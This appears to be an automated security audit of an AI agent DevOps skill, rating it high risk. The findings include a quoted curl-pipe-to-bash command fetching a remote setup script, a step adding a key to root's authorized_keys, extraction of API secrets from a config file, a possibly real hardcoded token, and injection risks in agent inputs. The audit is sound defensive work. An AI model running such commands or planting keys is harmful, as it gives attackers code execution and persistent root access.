Skills
skills/evolv3ai/claude-skills-archive/admin-devops/Gen Agent Trust Hub

admin-devops

Fail

Audited by Gen Agent Trust Hub on Mar 10, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONCREDENTIALS_UNSAFEEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The file templates/coolify-enhanced-quick-start.md contains a command pattern curl -fsSL https://raw.githubusercontent.com/YOUR-ORG/vibeskills-demo/main/.claude/skills/admin-devops/scripts/coolify-enhanced-setup.sh | bash. Direct piping of unverified scripts from an external, untrusted source into a shell is a major security risk.
  • [COMMAND_EXECUTION]: The skill frequently uses sudo to execute commands with elevated privileges. Specifically, references/INSTALLATION.md (Coolify) contains instructions to append a public key to /root/.ssh/authorized_keys, granting the agent or the service persistent root access to the server.
  • [CREDENTIALS_UNSAFE]: The script scripts/kasm/lib/kasm-api.sh extracts API keys and secrets directly from the local filesystem (/opt/kasm/current/conf/app/api.app.config.yaml). Additionally, references/cloudflare-origin-certificates.md includes a hardcoded token string y^48ZTz3ZJ8J in an example selection, which could be a real credential or used as a fallback.
  • [EXTERNAL_DOWNLOADS]: Several reference files (e.g., references/contabo.md, references/kasm.md) instruct the download and installation of binary executables and scripts from external URLs. While some point to official repositories, others rely on the user to ensure the integrity of the source.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection through its ingestion of inventory files (.agent-devops.env) and user-provided inputs. These inputs are interpolated into high-capability shell commands (e.g., ssh, oci, hcloud) across various management scripts with minimal sanitization.
  • Ingestion points: .agent-devops.env (inventory), input-schema.json (user parameters).
  • Boundary markers: Generally absent; inputs are directly interpolated into bash variables used in command lines.
  • Capability inventory: Subprocess calls to cloud CLIs (oci, hcloud, doctl, cntb), SSH, and network operations via curl in scripts like oci-infrastructure-setup.sh and coolify-fix-dns.sh.
  • Sanitization: Limited to basic regex validation in the JSON schema for some fields, leaving others vulnerable to command injection payloads.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 10, 2026, 03:49 AM